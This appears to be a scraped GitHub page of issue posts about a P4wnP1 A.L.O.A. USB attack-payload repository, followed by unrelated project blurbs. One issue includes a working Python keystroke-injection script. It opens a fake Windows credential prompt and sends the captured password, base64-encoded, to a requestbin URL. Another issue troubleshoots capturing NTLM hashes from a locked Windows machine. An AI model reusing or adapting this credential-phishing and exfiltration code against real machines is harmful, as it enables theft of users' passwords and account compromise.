nightrang3r / p4wnp1-a.l.o.a.-payloads Goto Github PK
View Code? Open in Web Editor NEWpayloads for P4wnP1 A.L.O.A
payloads for P4wnP1 A.L.O.A
I'm looking for a LCD/OLED display that works with the preconfigured script. are there some that have been tested to work or do I need to buy one and hope it works?
so I don't have a sd card for the pi0W and i was going to make it in python,
its the same code but on the last line i change hidden
with Normal
wondering if you can help me. i know at this is not your code so just close this issues if you don't wanna deal with it.
My python code
import pyautogui as p
import time
URL = "http://requestbin.net/r/dum96elf"
p.keyDown("win")
p.keyDown("r")
p.keyUp("win")
p.keyUp("r")
time.sleep(1)
p.typewrite("powershell\n")
time.sleep(1)
p.typewrite("$popup = \"while (`$true){`$cred = `$host.ui.promptforcredential(`'Failed Authentication`',`'`',[Environment]::UserDomainName + `\"\\`\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};if (`$cred.getnetworkcredential().password) {break :DoLoop}};`$Text = `$cred.username + `\":`\" + `$cred.getnetworkcredential().password;`$Bytes = [System.Text.Encoding]::Unicode.GetBytes(`$Text);`$EncodedText =[Convert]::ToBase64String(`$Bytes);Invoke-WebRequest -UseBasicParsing -Uri " + URL + "/`$EncodedText; rm $Env:UserProfile\\popup.ps1\"\n")
time.sleep(1)
p.typewrite("echo $popup > $Env:UserProfile\\popup.ps1\n")
time.sleep(1)
p.typewrite("powershell.exe -Exec Bypass -windowstyle Normal $Env:UserProfile\\popup.ps1\n")
the error i get
C:\Users\Jayden : The term 'C:\Users\Jayden' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ C:\Users\Jayden Robbin\popup.ps1
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Jayden:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
I have a Windows 10 Pro 10.0.19045 Build 19045 running in a Virtualbox VM (no guest tools installed).
I passed through the USB device and it gets a network (DHCP lease and so on) from the PI0w, everything fine so far.
The attack works fine if i interact with the VM, unlock it and type some random \\teststring
into the explorer search bar (pretty similar to the attack in QuickDraw.sh
), because now there is a network request to my P4wnP1 poisoning device.
But when i lock the screen and start the attack, i can wait for hours an do not receive a hash.
I researched a bit on the attack and found out it is from around 2016 and only works when network requests are made in the background. So i set up another VM with a DNS server and a Samba share. The Windows VM is able to request the server address from the DNS server and is able to access the Samba share via \\fakeshare.local
. I mapped the network drive to a drive in Windows and locked the screen. So after this setup, i connected the PI0w again to the Windows VM and launch the attackscript QuickCreds.sh
. -> i don't get no Hash.
in Win VM:
like already said: the attack works fine if the screen is unlocked and i request something in the explorer search bar, there is just no NTLM hash sent when the screen is locked.
can you help me out or do you think Microsoft did mitigate this behaviour so the attack can't be exploited anymore?
Is it possible to run on raspberry pi zero 2W
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.